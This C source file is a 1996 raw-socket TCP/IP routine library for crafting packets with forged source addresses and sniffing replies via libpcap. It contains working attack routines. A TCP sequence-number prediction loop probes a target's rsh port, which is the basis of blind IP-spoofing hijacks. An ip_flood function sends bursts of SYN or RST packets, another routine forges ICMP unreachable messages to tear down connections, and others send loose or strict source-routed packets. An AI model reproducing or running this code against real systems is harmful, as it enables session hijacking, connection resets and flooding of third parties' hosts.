/* My tcp/ip routine collection 
   written 1996 by provos@physnet.uni-hamburg.de 

   USE WITH CARE :-) */

#define _tcp_header
#include "tcp.h"

#define MAXNAME 	140

#define NUMTESTS 10		/* 10 tests to get sequence number */

/* Function Prototypes */
typedef void if_print_fcn(u_char *, const struct pcap_pkthdr *,
			  register const u_char *);

void ppp_if_print(u_char * user, const struct pcap_pkthdr *h,
		  register const u_char * p);
void ether_if_print(u_char * user, const struct pcap_pkthdr *h,
		    register const u_char * p);

/* The magic for the mini_hash */
ushort magic[] ={0x7541, 0x3528, 0x1532, 0x1655}; 

#ifndef DLPI
int sndsock;			/* send socket file descriptor */
#else
char *router_hdw;
#endif
int datalen = 0;
u_short ident = 0;

static jmp_buf env_alrm;

#define DEFAULT_SNAPLEN 500

static pcap_t *pd;
const u_char *snapend, *packetp;
char *dev_name;
struct bpf_program our_filter;

static if_print_fcn *if_print; /* Evaluator */

static void sig_alrm(int signo)
{
        longjmp(env_alrm, 1);
}

struct hostent *resolve_ip(char *name)
{
	struct hostent *tmp;

	if (!(tmp = gethostbyname(name))) {
		Fprintf(stderr, "Can't get address for %s\n", name);
		exit(1);
	}
	strncpy(name, tmp->h_name, MAXNAME);
	return tmp;
}

/* This is supposed to be fast and not good */

/* static INLINE */ ulong mini_hash(ulong init)
{				/* We assume long = 2 short */
	static ushort left, right;

	left = init >> 16 & 0xffff;
	right = init & 0xffff;

	left = magic[(right >> 2) & 3]^((left + right)&0xffff);

	right = ~right ^ left;

	return left + (~right << 16);
}

ulong hash( ulong *buffer, ulong length )
{ static ulong result, i;

  result = 0;
  for( i=0; i<length; i++ )
        result = result^mini_hash( result^(*buffer++) );

  return result;
}


unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
	register long sum;	/* assumes long == 32 bits */
	u_short oddbyte;
	register u_short anwser;	/* assumes u_short == 16 bits */

	/* 
	 * Our algorithm is simple, using a 32-bit accumulator (sum),
	 * we add sequential 16-bit words to it, and at the end, fold back
	 * all the carry bits from the top 16 bits into the lower 16 bits.
	 */

	sum = 0;
	while (nbytes > 1) {
		sum += *ptr++;
		nbytes -= 2;
	}

	/* mop up an odd byte, if necessary */
	if (nbytes == 1) {
		oddbyte = 0;	/* make sure top half is zero */
		*((u_char *) & oddbyte) = *(u_char *) ptr;	/* one
								   byte
								   only */
		sum += oddbyte;
	}
	/* 
	 * Add back carry outs from top 16 bits to low 16 bits.
	 */

	sum = (sum >> 16) + (sum & 0xffff);	/* add high-16 to low-16 */
	sum += (sum >> 16);	/* add carry */
	anwser = ~sum;		/* ones-complement, then truncate to 16
				   bits */
	return (anwser);
}

int set_pcap_filter(char *filter)
{
	unsigned int our_netmask, our_neta;
	struct in_addr blubber;
	char errbuf[MAXNAME];

	if (pcap_lookupnet(dev_name, &our_neta, &our_netmask, errbuf) < 0) {
		Fprintf(stderr, "tcp.o: %s\n", errbuf);
		return 0;
	}
	blubber.s_addr = our_neta;
	Dprintf(stdout, "Setting filter for %s", inet_ntoa(blubber));
	blubber.s_addr = our_netmask;
	Dprintf(stdout, " %s\n", inet_ntoa(blubber));

	if (pcap_compile(pd, &our_filter, filter, TRUE, our_netmask) < 0) {
		Fprintf(stderr, "tcp.o: %s: %s\n", pcap_geterr(pd), filter);
		return 0;
	}
	return pcap_setfilter(pd, &our_filter);
}

int make_pcap_hook()
{
	char errbuf[PCAP_ERRBUF_SIZE];

	/* Install our packet filter */

	if ((dev_name = pcap_lookupdev(errbuf)) == NULL) {
		Fprintf(stderr, "tcp.o: %s\n", errbuf);
		return 0;
	} else {
		Dprintf(stdout, "Grabbing on device %s\n", dev_name);
		pd = pcap_open_live(dev_name, DEFAULT_SNAPLEN, 1, 1000, errbuf);
		if (pd == NULL) {
			Fprintf(stderr, "tcp.o: %s\n", errbuf);
			return 0;
		}
	}
        /* Set pointer up for the getsequence */
        iph = &(our_probe.ip);
        tcph = (struct tcphdr *) ((char *) iph + sizeof(*iph));

        if (strncmp("eth", dev_name, 3) == 0)
                if_print = ether_if_print;
        else if (strncmp("en", dev_name, 2) == 0)
                if_print = ether_if_print;
        else if (strncmp("le", dev_name, 2) == 0)
                if_print = ether_if_print;
        else if (strncmp("ppp", dev_name, 3) == 0)
                if_print = ppp_if_print;
        else {
                Fprintf(stderr, "No supported evaluater: %s\n", dev_name);
                return 0;
        }

	return 1;
}

static INLINE long wait_tcp_anwser_once(struct in_addr to, ushort dport,
                          struct in_addr from, ushort sport)
{
        static long result;

        if (setjmp(env_alrm)) {
                D2printf(stderr, "wait_tcp_anwser: Caught alarm.\n");
                return 0;
        }
        signal(SIGALRM, sig_alrm);
        alarm(0);
        alarm(2);
        for (;;) {

                if (pcap_dispatch(pd, 1, if_print, NULL) == 1) {
                        tcph = (struct tcphdr *) ((char *) iph + iph->ip_hl * 4);
                        if ((!sport || ntohs(tcph->th_dport) == sport) &&
                            (!dport || ntohs(tcph->th_sport) == dport) &&
                            (!to.s_addr || iph->ip_src.s_addr == to.s_addr))
                                break;
                }
        }
        alarm(0);
        signal(SIGALRM, SIG_DFL);
        result = ntohl(tcph->th_seq);

        if (tcph->th_flags & TH_PUSH)
                result += ntohs(iph->ip_len) - tcph->th_off * 4 - iph->ip_hl * 4;
        else if (tcph->th_flags & (TH_SYN | TH_FIN))
                result++;

        return result;
}

struct tcphdr wait_tcp(struct in_addr to, ushort dport,
		       struct in_addr from, ushort sport, int tcp_flag)
{	return_now = FALSE;
	while ( !return_now ) {
#ifdef DEBUG
		Fprintf( stdout, "." ); fflush( stdout );
#endif
		while (wait_tcp_anwser_once(to, dport, from, sport)) {
			if( ( !tcp_flag || tcph->th_flags == tcp_flag) )
				return *tcph;
		}
	}
	return *tcph;
}

void print_tcp_data(int silent)
{
	int i, length = ntohs(iph->ip_len) - tcph->th_off * 4 - iph->ip_hl * 4;
	unsigned char *string = (char *) tcph + sizeof(*tcph);

	if (!length)
		return;

	if (!silent)
		Fprintf(stdout, "Got %d data: ", length);
	for (i = 0; i < length; i++)
		if (isprint(string[i])||(silent && isspace(string[i])))
			Fprintf(stdout, "%c", string[i]);
		else if (!silent)
			Fprintf(stdout, "[%d]", string[i]);
	if (!silent)
		Fprintf(stdout, "\n");
	fflush(stdout);
}

void send_source_tcp(struct in_addr to, ushort dport,
		     struct in_addr from, ushort sport,
		 int flags, long seq, long ack, char *data, int data_len,
		     int code, int ptr, struct in_addr **source_list)
{
	char src_route[40];	/* The source route option field */
	int counter = 0;
	if (code != LSRR && code != SSRR) {
		Fprintf(stderr, "send_source_tcp: No LSRR nor SSRR\n");
		exit(1);
	}
	(void) bzero(src_route, 40);

	src_route[0] = code;
	src_route[2] = ptr;

	/* We take up to 9 source routes */
	while (*source_list && counter < 9) {
		(void) bcopy((char *) &(*source_list)->s_addr,
			     src_route + 3 + counter * 4, 4);
		source_list++;
		counter++;
	}

	if (ptr > (counter + 1) * 4) {
		Fprintf(stderr, "send_source_tcp: ptr > given src routes.\n");
		exit(1);
	}
	/* 3 is the protcol overhead */
	src_route[1] = 3 + counter * 4;

	send_tcp(to, dport, from, sport, (counter + 1) * 4, src_route, 0, NULL,
		 flags, seq, ack, data, data_len);
}

int check_source_route(struct in_addr to, struct in_addr from,
		       struct in_addr source)
{
	long result;
	long my_syn = getpid() + 0x12453 + 90000 * rand() / RAND_MAX;
	struct in_addr *src_route[2];

	/* Send a loose source routed packet */

	src_route[0] = &source;
	src_route[1] = NULL;

	send_source_tcp(to, 25, from, 2303, TH_SYN, my_syn, 0, NULL, 0,
			LSRR, 8, src_route);
	result = wait_tcp_anwser(to, 25, from, 2303);
	result = result && ((iph->ip_hl << 2) > sizeof(*iph) );
	/* Now reset the connection we dont want to flood somebody queue */
	send_source_tcp(to, 25, from, 2303, TH_RST, my_syn + 1, 0, NULL, 0,
			LSRR, 8, src_route);
	return result;
}


void ip_flood(struct in_addr to, ushort dport, struct in_addr from,
	      int tcp_flag, ulong init)
{
	int i;
	init = mini_hash(0x67eeff + init);
	for (i = 0; i < 100; i++) {
		send_tcp_simple(to, dport, from, 2303 + i,
			   tcp_flag, init + (tcp_flag == TH_RST ? 1 : 0),
				0, NULL, 0);
		init = mini_hash(init);
	}
}

int check_port(struct in_addr to, ushort dport, struct in_addr from)
{
	int result;
	long my_syn = getpid() + 0x12453;

	send_tcp_simple(to, dport, from, 2303, TH_SYN, my_syn, 0, NULL, 0);
	if (wait_tcp_anwser(to, dport, from, 2303))
		if (tcph->th_flags & TH_RST)
			result = 0;
		else
			result = 1;
	else
		result = -1;
	/* Now reset the connection we dont want to flood somebody queue */
	send_tcp_simple(to, dport, from, 2303, TH_RST, my_syn + 1, 0, NULL, 0);
	return result;
}

int check_reach(struct in_addr to, struct in_addr from)
{
	long result;
	long my_syn = getpid() + 0x12453;

	send_tcp_simple(to, 25, from, 2303, TH_SYN, my_syn, 0, NULL, 0);
	result = wait_tcp_anwser(to, 25, from, 2303);
	/* Now reset the connection we dont want to flood somebody queue */
	send_tcp_simple(to, 25, from, 2303, TH_RST, my_syn + 1, 0, NULL, 0);
	return result;
}


void close_raw_socket()
{
	ident = 0;
#ifndef DLPI
	close(sndsock);
#endif
}

int make_raw_socket()
{
        int on = 1;
        ident = (getpid() & 0xffff) | 0x8000;

#ifdef DLPI
	/* This is lame - hehe */
	setup_dlpi();
	router_hdw = "0:0:c:3:cf:f7";
	return 1;
#else

	if ((sndsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("ipspoof: raw socket");
		return 0;
	}
	/* We want to use our own ip header, esp. our own saddr */
#ifdef IP_HDRINCL
#ifdef AIX
        if (setsockopt(sndsock, SOL_SOCKET, SO_BROADCAST,
                       (char *) &on, sizeof(on)) < 0) {
                perror("setsockopt: SO_BROADCAST");
                close(sndsock);
                return 0;
        }
#endif
	if (setsockopt(sndsock, IPPROTO_IP, IP_HDRINCL,
		       (char *) &on, sizeof(on)) < 0) {
		perror("setsockopt: IP_HDRINCL");
		close(sndsock);
		return 0;
	}
	return 1;
#else
	Fprintf(stderr, "Your os must support IP_HDRINCL\n");
	close(sndsock);
	return 0;
#endif
#endif
}

long wait_tcp_anwser(struct in_addr to, ushort dport,
		     struct in_addr from, ushort sport)
{
	static long result;
	static int counter;

	counter = 0;	
	result = 0;
	while (counter < 3 && !result) {
		result = wait_tcp_anwser_once(to, dport, from, sport);
		if (!result) {
			D2printf(stdout, "wait_tcp_anwser: Resent %d\n",
				 counter + 1);
			resend_ip_packet();
		}
		counter++;
	}

	return result;
}

void show_tcp_packets(int max)
{
	static int i;

	if (setjmp(env_alrm)) {
		D2printf(stderr, "show_tcp_packets: Caught alarm.\n");
		return;
	}
	signal(SIGALRM, sig_alrm);
	for (i = 0; i < max; i++) {
		alarm(0);
		alarm(10);
		if (pcap_dispatch(pd, 1, if_print, NULL) == 1) {
			print_tcp_data(TRUE);
		}
	}
	alarm(0);
}

/* This is partly from engarde's ipspooferr, this could need a rewrite. */

void get_sequence(struct sockaddr_in *to, ushort rsh_port, struct sockaddr_in *from,
		  ulong * seq_next, u_long * offset)
{
	static int i;
	static u_long start_seq;
	static u_long start_port;
	static u_long prev_seq, diff[2];

	/* Set pointer up for the getsequence */
	start_seq = 4138353 + getpid();
	start_port = 600;
	prev_seq = 0;

	*offset = 0;
	diff[0] = diff[1] = 0;

	for (i = 0; i < NUMTESTS; i++) {
		Dprintf(stdout, "Sending our_probe %d:\n", i + 1);
		send_tcp_simple(to->sin_addr, rsh_port,
				from->sin_addr, start_port,
				TH_SYN, start_seq, 0, NULL, 0);

		if (setjmp(env_alrm)) {
			Fprintf(stderr, "Caught alarm. Next our_probe.\n");
			continue;
		}
		signal(SIGALRM, sig_alrm);
		alarm(0);
		alarm(1);

		for (; 1;) {

			if (pcap_dispatch(pd, 1, if_print, NULL) == 1)
				if (ntohs(tcph->th_dport) == start_port &&
				    ntohs(tcph->th_sport) == rsh_port&&
				    iph->ip_src.s_addr == to->sin_addr.s_addr) {
					if (prev_seq) {
						diff[i % 2] = ntohl(tcph->th_seq) - prev_seq;
						Dprintf(stdout, "(prev=%lu, new=%lu, diff=%lu|ack=%lu\n", prev_seq,
							ntohl(tcph->th_seq), diff[i % 2], ntohl(tcph->th_ack));
					} else
						diff[i % 2] = 0;
					if (*offset == 0)
						*offset = diff[i % 2];
					else {
						if (*offset != diff[i % 2])
							Dprintf(stdout, "Difference in Offset: old=%lu, new=%lu\n",
								*offset, diff[i % 2]);
						*offset = diff[i % 2];
					}
					prev_seq = ntohl(tcph->th_seq);
					send_tcp_simple(to->sin_addr, rsh_port,
					    from->sin_addr, start_port++,
					TH_RST, ++start_seq, 0, NULL, 0);

					break;
				}
		}
		alarm(0);
	}			/* for i=0 i<numtests... */
	signal(SIGALRM, SIG_DFL);
	*offset = diff[i % 2];
	*seq_next = prev_seq + *offset;
	Printf("Seq: %lu (off=%lu)\n", *seq_next, *offset);
}

char *make_ip_header(struct ip *ip, struct in_addr to, struct in_addr from,
		     int ip_opt_len, char *ip_opt_pointer, int proto,
		     int ttl, short ident, long datalen)
{
	/* Clear IP header */
	(void) bzero((char *) ip, sizeof(struct ip));

	if (ip_opt_len)
		(void) bcopy(ip_opt_pointer, (char *) ip + sizeof(*ip), ip_opt_len);

	ip->ip_dst = to;
	ip->ip_src = from;
	ip->ip_sum = 0;
	ip->ip_off = 0;
	ip->ip_hl = (sizeof(*ip) + ip_opt_len) >> 2;
	ip->ip_p = proto;
	ip->ip_len = htons(datalen);
	ip->ip_ttl = ttl;
	ip->ip_v = 4;
	ip->ip_id = htons(ident++);
	ip->ip_tos = 0;

	ip->ip_sum = in_cksum( (short *)ip, ip->ip_hl << 2 );
	return (char *) ip + (ip->ip_hl << 2);
}

unsigned short make_checksum(char *prot_hdr, unsigned int saddr, unsigned int daddr,
			     unsigned char proto, unsigned short length)
{
	struct pseudo_header {
		unsigned int source_address;
		unsigned int dest_address;
		unsigned char placeholder;
		unsigned char protocol;
		unsigned short hdr_length;
		char header[MAXPACKET];
	} pseudo_header;

	/* Build TCP Header Checksum */
	pseudo_header.source_address = saddr;
	pseudo_header.dest_address = daddr;
	pseudo_header.placeholder = 0;
	pseudo_header.protocol = proto;
	pseudo_header.hdr_length = htons(length);

	bcopy(prot_hdr, (char *) &pseudo_header.header,
	      length);

	return in_cksum((unsigned short *) &pseudo_header,
			length + 12);
}

#ifdef LINUX
#define ICMP_SIZE sizeof(struct *icmphdr)
#define ICMP_UNREACH 3
#else
#define ICMP_SIZE sizeof(struct *icmp)
#endif

void send_icmp_unreach(struct in_addr to, struct in_addr from,
		       struct in_addr uto, ushort dport,
		       struct in_addr ufrom, ushort sport,
		       u_char code)
{
#ifdef AIX
#undef icmp_data
#endif

	struct icmp_data {
		struct ip iphdr;
		union {
			struct tcphdr tcphdr;
		} icmp_tcp;
	} icmp_data;

	make_ip_header(&icmp_data.iphdr, uto, ufrom,
		    0, 0, IPPROTO_TCP, 16, 0, sizeof(struct tcphdr) + 4);

	icmp_data.iphdr.ip_sum = mini_hash(0xf0f0f0f0 + ident++);
	D2printf(stdout, "Faked ip header checksum: %d\n", icmp_data.iphdr.ip_sum);
	icmp_data.icmp_tcp.tcphdr.th_sport = htons(sport);
	icmp_data.icmp_tcp.tcphdr.th_dport = htons(dport);
	icmp_data.icmp_tcp.tcphdr.th_seq = mini_hash(dport);

	send_icmp_simple(to, from, ICMP_UNREACH, code, (char *) &icmp_data,
			 sizeof(struct ip) + 8);
}

void send_icmp(struct in_addr to, struct in_addr from,
	       int ip_opt_len, char *ip_opt_pointer,
	       u_char type, u_char code,
	       char *string, int length)
{
	struct ip *ip;
#ifndef LINUX
	struct icmp *icmp;
#else
/* Linux hasnt a standarized icmp header */
	struct icmphdr *icmp;
#define icmp_type type
#define icmp_code code
#define icmp_cksum checksum
#endif
	int i;

	if (!ident) {
		Fprintf(stderr, "tcp.o: Raw Socket not initalized\n");
		exit(1);
	}
	ip = (struct ip *) &(outpacket.ip);

	/* 20 IP + 20 TCP + OPTIONS */
	datalen = sizeof(*ip) + sizeof(*icmp) + ip_opt_len + length;

	icmp = make_ip_header(ip, to, from, ip_opt_len, ip_opt_pointer,
			      IPPROTO_ICMP, 16, ident, datalen);

	(void) bzero((char *) icmp, sizeof(*icmp));
	icmp->icmp_type = type;
	icmp->icmp_code = code;

	Dprintf(stdout, "Sending IMCP Packet: type %d, code %d, length %d\n",
		type, code, length);

	/* Copy our tcp data */
	if (length)
		memcpy((char *) icmp + sizeof(*icmp), string, length);

	/* Build ICMP Header Checksum */
	icmp->icmp_cksum = make_checksum((char *) icmp, ip->ip_src.s_addr,
					 ip->ip_dst.s_addr, IPPROTO_ICMP,
					 sizeof(*icmp) + length);
#ifdef DLPI
	dlpi_send( router_hdw, (char *)ip, datalen );
#else
	i = sendto(sndsock, (char *) ip, datalen, 0, &whereto,
		   sizeof(struct sockaddr));
	if (i < 0 || i != datalen) {
		if (i < 0)
			perror("sendto");
		Printf("send_icmp: wrote %d chars, ret=%d\n",
		       datalen, i);
		(void) fflush(stdout);
	}
#endif
}


void send_tcp(struct in_addr to, ushort dport, struct in_addr from,
	      ushort sport, int ip_opt_len, char *ip_opt_pointer,
	      int tcp_opt_len, char *tcp_opt_pointer,
	      int tcp_flag, ulong seq, ulong ack,
	      char *string, int length)
{
	struct ip *ip;
	struct tcphdr *tcp;
	int i;

	if (!ident) {
		Fprintf(stderr, "tcp.o: Raw Socket not initalized\n");
		exit(1);
	}
	ip = (struct ip *) &(outpacket.ip);

	/* 20 IP + 20 TCP + OPTIONS */
	datalen = sizeof(*ip) + sizeof(*tcp) + ip_opt_len + tcp_opt_len + length;

	tcp = (struct tcphdr *) make_ip_header(ip, to, from, ip_opt_len,
		  ip_opt_pointer, IPPROTO_TCP, 16, ident + seq, datalen);

	if (tcp_opt_len)
		(void) bcopy(tcp_opt_pointer, (char *) tcp + sizeof(*tcp), tcp_opt_len);

	tcp->th_sport = htons(sport);
	tcp->th_dport = htons(dport);
	tcp->th_seq = htonl(seq);

	if (tcp_flag & TH_SYN)
		Dprintf(stdout, "Send_tcp: SYN %lu ACK %lu\n", seq, ack);
	else if (tcp_flag & TH_PUSH)
		Dprintf(stdout, "Send_tcp: PSH %lu:%lu(%d) ACK %lu\n", seq,
			seq + length, length, ack);
	else if (tcp_flag & TH_FIN)
		Dprintf(stdout, "Send_tcp: FIN %lu ACK %lu\n", seq, ack);
	else if (tcp_flag & TH_RST)
		Dprintf(stdout, "Send_tcp: RST %lu ACK %lu\n", seq, ack);

	tcp->th_ack = htonl(ack);
	tcp->th_flags = tcp_flag;

	tcp->th_urp = 0;
	tcp->th_off = (sizeof(*tcp) + tcp_opt_len) / 4;
	tcp->th_win = htons(16384);
	tcp->th_sum = 0;


	/* Copy our tcp data */
	if (length)
		memcpy((char *) tcp + sizeof(*tcp) + tcp_opt_len, string, length);

	/* Build TCP Header Checksum */
	tcp->th_sum = make_checksum((char *) tcp, ip->ip_src.s_addr,
				    ip->ip_dst.s_addr, IPPROTO_TCP,
				    tcp->th_off * 4 + length);
#ifdef DLPI
        dlpi_send( router_hdw, (char *)ip, datalen );
#else
	i = sendto(sndsock, (char *) ip, datalen, 0, &whereto,
		   sizeof(struct sockaddr));
	if (i < 0 || i != datalen) {
		if (i < 0)
			perror("sendto");
		Printf("send_tcp: wrote %d chars, ret=%d\n",
		       datalen, i);
		(void) fflush(stdout);
	}
#endif
}

void resend_ip_packet()
{
	int i;
	struct ip *ip = &(outpacket.ip);

	if (ip->ip_v != 4) {
		Fprintf(stdout, "resend_ip_packet: No packet.\n");
		exit(1);
	}
#ifdef DLPI
        dlpi_send( router_hdw, (char *)ip, datalen );
#else
	i = sendto(sndsock, (char *) ip, datalen, 0, &whereto,
		   sizeof(struct sockaddr));
	if (i < 0 || i != datalen) {
		if (i < 0)
			perror("sendto");
		Printf("resend_ip_packet: wrote %d chars, ret=%d\n",
		       datalen, i);
		(void) fflush(stdout);
	}
#endif
}

/* This is partly from tcpdump */

#define PPP_HDRLEN 4

void ppp_if_print(u_char * user, const struct pcap_pkthdr *h,
		  register const u_char * p)
{
	register int length = h->len;
	register int caplen = h->caplen;
	struct ip *ip;

	if (caplen < PPP_HDRLEN) {
		Printf("[|ppp]");
		goto ppp_out;
	}
	/* 
	 * Some printers want to get back at the link level addresses,
	 * and/or check that they're not walking off the end of the packet.
	 * Rather than pass them all the way down, we set these globals.
	 */
	packetp = p;
	snapend = p + caplen;

	length -= PPP_HDRLEN;
#ifdef SLOW_COPY
	ip = (struct ip *) (p + PPP_HDRLEN);

	/* Just copy the packet in our spool and see what happens */
	memcpy(&(our_probe.ip), ip, sizeof(outpacket));
#else
	iph = (struct ip *) (p + PPP_HDRLEN);
	tcph = (struct tcphdr *)((char *)iph + (iph->ip_hl<<2) );
#endif

      ppp_out:
	return;
}

#define ETHER_HDRLEN 14

void ether_if_print(u_char * user, const struct pcap_pkthdr *h, const u_char * p)
{
	int caplen = h->caplen;
	int length = h->len;
	struct ip *ip;

	if (caplen < ETHER_HDRLEN) {
		printf("[|ether]");
		goto ether_out;
	}
	/*
	 * Some printers want to get back at the ethernet addresses,
	 * and/or check that they're not walking off the end of the packet.
	 * Rather than pass them all the way down, we set these globals.
	 */
	packetp = p;
	snapend = p + caplen;

	length -= ETHER_HDRLEN;
	p += ETHER_HDRLEN;

#ifdef SLOW_COPY
	ip = (struct ip *) p;

	/* Just copy the packet in our spool and see what happens */
	memcpy(&(our_probe.ip), ip, sizeof(outpacket));
#else
        iph = (struct ip *) p;
        tcph = (struct tcphdr *)((char *)iph + (iph->ip_hl<<2) );
#endif

      ether_out:
	return;
}
